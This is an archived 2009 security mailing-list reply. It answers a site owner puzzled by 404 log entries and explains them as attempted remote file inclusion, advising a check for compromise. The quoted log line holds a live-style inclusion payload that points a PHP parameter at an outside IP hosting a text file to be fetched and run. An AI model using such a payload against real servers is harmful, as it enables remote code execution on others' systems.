WebApp Sec mailing list archives
Re: 404 messages pointing to a strange location
From: Daniel Clemens <daniel.clemens () packetninjas net>
Date: Sat, 3 Jan 2009 12:45:13 -0600
On Jan 2, 2009, at 4:10 AM, Simon wrote:
Hi all,Yesterday evening I had lots of 404-messages from my web server, all pointing to locations like http://foo.bar/something//ee_commerce/paypalcart.php?toroot=http://220.134.244.157/xoops/templates_c/id3.txt ? I don't use paypal or anything similar on my page; what does that mean?
Looks like a bug being exploited with file inclusion being rendered back to your server. I would look for other signs of compromise on your system as well as what Tom Ritter posted.
| Daniel Uriah Clemens | Packetninjas L.L.C | | http://www.packetninjas.net | c. 205.567.6850 | | o. 866.267.8851 "The secret to creativity is knowing how to hide your sources" Einstein -------------------------------------------------------------------------Sponsored by: Watchfire Methodologies & Tools for Web Application Security Assessment With the rapid rise in the number and types of security threats, web application security assessments should be considered a crucial phase in the development of any web application. What methodology should be followed? What tools can accelerate the assessment process? Download this Whitepaper today!
https://www.watchfire.com/securearea/whitepapers.aspx?id=70170000000940F -------------------------------------------------------------------------
Current thread:
- 404 messages pointing to a strange location Simon (Jan 03)
- Re: 404 messages pointing to a strange location Stefan Tanase (Jan 04)
- Re: 404 messages pointing to a strange location Simon (Jan 04)
- Re: 404 messages pointing to a strange location Daniel Clemens (Jan 04)
- <Possible follow-ups>
- RE: 404 messages pointing to a strange location Tom Ritter (Jan 03)
- Re: 404 messages pointing to a strange location Simon (Jan 04)
- Re: 404 messages pointing to a strange location arvind doraiswamy (Jan 04)
- Re: 404 messages pointing to a strange location Stefan Tanase (Jan 04)